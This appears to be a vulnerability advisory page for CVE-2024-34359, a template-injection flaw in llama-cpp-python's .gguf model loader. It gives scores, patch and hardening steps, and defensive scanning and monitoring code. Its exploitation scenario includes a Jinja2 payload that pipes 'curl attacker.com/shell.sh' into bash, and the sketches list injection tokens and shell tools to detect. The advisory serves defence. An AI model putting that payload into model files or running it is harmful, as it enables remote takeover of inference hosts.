CVE-2024-34359: llama-cpp-python: SSTI in .gguf loader enables RCE

CRITICAL · PoC Available · CISA SSVC: Attend
Published May 14, 2024
CISO Take

Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.

Risk Assessment

Critical exposure for all llama-cpp-python deployments. A CVSS score of 9.6 with a network vector and low attack complexity means this is trivially weaponizable once a malicious .gguf is in circulation. The 'User Interaction Required' flag is misleading in AI/ML contexts: loading new models is routine workflow for developers, MLOps engineers, and researchers, so in practice it is almost no barrier. The changed scope (S:C) combined with high confidentiality, integrity, and availability impact (C:H/I:H/A:H) means full host takeover, not just model compromise. There was no evidence of active exploitation (no CISA KEV listing) at time of publication, but model-as-attack-vector is a maturing supply chain threat with a high probability of real-world abuse.

Severity & Risk

CVSS 3.1: 9.6 / 10
EPSS: 39.4% chance of exploitation within 30 days (higher than 97% of all CVEs)
Exploitation status: exploit available
Exploitation likelihood: medium
Sophistication: moderate
Exploitation confidence: medium
CISA SSVC: public PoC (indexed in trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV: Network
AC: Low
PR: None
UI: Required
S: Changed
C: High
I: High
A: High

Recommended Action

6 steps
  1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.

  2. Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries.

  3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.

  4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers); see the detection sketch after this list.

  5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.

  6. Pipeline gate: add metadata inspection to CI/CD pipelines that scans .gguf chat_template fields for Jinja2 injection patterns before loading; see the scanning sketch after this list.
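
A minimal sketch of the pipeline gate in step 6, assuming a crude byte-level scan is acceptable as a first pass; a production gate would parse the GGUF metadata structure properly rather than grep raw bytes, and the token list and blocking policy below are illustrative, not exhaustive.

```python
# Crude CI/CD gate: flag .gguf files whose raw bytes contain Jinja2/Python
# introspection tokens that a legitimate chat template has no reason to use.
import re
import sys
from pathlib import Path

SUSPICIOUS = [
    rb"__class__", rb"__mro__", rb"__subclasses__", rb"__globals__",
    rb"__builtins__", rb"os\.popen", rb"subprocess",
]

def scan_gguf(path: Path) -> list[str]:
    """Return the suspicious tokens found anywhere in the file's raw bytes."""
    data = path.read_bytes()
    return [pat.decode() for pat in SUSPICIOUS if re.search(pat, data)]

if __name__ == "__main__":
    findings = scan_gguf(Path(sys.argv[1]))
    if findings:
        print(f"BLOCK: suspicious template tokens found: {findings}")
        sys.exit(1)
    print("PASS: no obvious injection tokens found")
```

And a minimal sketch of the detection idea in step 4, assuming psutil is available and that inference workers can be identified by a command-line marker (the `llama_cpp` marker is an assumption; adapt it to how your workers are actually launched).

```python
# Flag inference workers whose children look like shells or downloaders.
import psutil

SUSPICIOUS_CHILDREN = {"bash", "sh", "dash", "curl", "wget"}

def check_inference_workers(marker: str = "llama_cpp") -> list[str]:
    """Report inference processes that have spawned suspicious child processes."""
    alerts = []
    for proc in psutil.process_iter(["pid", "cmdline"]):
        cmdline = " ".join(proc.info.get("cmdline") or [])
        if marker not in cmdline:
            continue
        try:
            children = proc.children(recursive=True)
        except psutil.NoSuchProcess:
            continue
        for child in children:
            if child.name() in SUSPICIOUS_CHILDREN:
                alerts.append(f"pid {proc.pid} spawned {child.name()} (pid {child.pid})")
    return alerts

if __name__ == "__main__":
    for alert in check_inference_workers():
        print("ALERT:", alert)
```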

CISA SSVC Assessment

Decision: Attend
Exploitation: PoC
Automatable: No
Technical Impact: Total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Article 15 (Accuracy, robustness and cybersecurity); Article 23 (Obligations of providers of general-purpose AI models)
ISO 42001: A.6.2.5 (AI system security); A.8.1 (AI supplier relationships)
NIST AI RMF: GOVERN 5.2 (AI supply chain and third-party risk management); MANAGE 2.4 (Risks from AI system components and dependencies)
OWASP LLM Top 10: LLM03 (Supply Chain)

Frequently Asked Questions

What is CVE-2024-34359?

CVE-2024-34359 is a server-side template injection (SSTI) vulnerability in llama-cpp-python. The library parses the chat_template field from a .gguf model's metadata with an unsandboxed jinja2.Environment, so a crafted template executes arbitrary code on the host when the model is loaded. An attacker only needs to get a malicious .gguf file loaded, whether through a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 and restrict model sources to verified, internal registries.

Is CVE-2024-34359 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-34359, increasing the risk of exploitation.

How to fix CVE-2024-34359?

Upgrade llama-cpp-python to 0.2.72 or later (commit b454f40a), which introduces a sandboxed Jinja2 environment for chat template parsing. Beyond patching: load .gguf files only from verified, internally mirrored model registries; run inference under a dedicated low-privilege account in a container with no network egress and read-only model mounts; monitor for unexpected child processes (bash, sh, curl, wget) spawned by inference workers; audit existing .gguf files and verify their SHA256 against the source registry; and add .gguf chat_template scanning to CI/CD pipelines before models are loaded.

What systems are affected by CVE-2024-34359?

This vulnerability affects the following AI/ML architecture patterns: local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines.

What is the CVSS score for CVE-2024-34359?

CVE-2024-34359 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 39.41%.

Technical Details

NVD Description

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on the `Llama` class in `llama.py` to load `.gguf` llama.cpp models. The `__init__` constructor of `Llama` takes several parameters to configure the loading and running of the model. Besides NUMA, LoRA settings, tokenizer loading, and hardware settings, `__init__` also loads the chat template from the targeted `.gguf` file's metadata and passes it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct `self.chat_handler` for the model. However, `Jinja2ChatFormatter` parses the chat template from that metadata with a sandbox-less `jinja2.Environment`, which is then rendered in `__call__` to construct the prompt of the interaction. This allows Jinja2 server-side template injection, which leads to remote code execution via a carefully constructed payload.
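
The crux is the choice of Jinja2 environment. The sketch below (not llama-cpp-python's actual code) contrasts an unsandboxed `jinja2.Environment` with a sandboxed environment of the kind the patched release adopts; the template string stands in for a hostile chat_template pulled from .gguf metadata, using a harmless introspection probe rather than a live payload.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import ImmutableSandboxedEnvironment

# Harmless stand-in for an SSTI probe: real payloads walk __class__/__mro__
# down to something like subprocess.Popen.
hostile_template = "{{ ''.__class__.__mro__ }}"

# Pre-0.2.72 behaviour: the unsandboxed environment renders the introspection freely.
print(Environment().from_string(hostile_template).render())

# Patched behaviour: the sandbox refuses access to underscore attributes.
try:
    print(ImmutableSandboxedEnvironment().from_string(hostile_template).render())
except SecurityError as exc:
    print(f"Blocked by sandbox: {exc}")
```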

Exploitation Scenario

An adversary uploads a malicious .gguf model to Hugging Face under a convincing namespace (e.g., a typosquat of a popular model). The model's metadata contains a crafted chat_template field with a Jinja2 payload exploiting Python's object introspection: `{{ ''.__class__.__mro__[2].__subclasses__()[XXX]('curl attacker.com/shell.sh | bash', shell=True, ...) }}`. An ML engineer discovers the model via a search or dependency, pulls it for benchmarking, and calls `Llama(model_path='malicious.gguf')`. At instantiation — before any prompts are sent — the template is parsed and rendered in an unsandboxed environment, executing the payload. The adversary receives a reverse shell on the inference host with the privileges of the Python process, gaining access to GPU resources, environment secrets, and internal APIs.

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Timeline

Published
May 14, 2024
Last Modified
November 21, 2024
First Seen
May 14, 2024

Related Vulnerabilities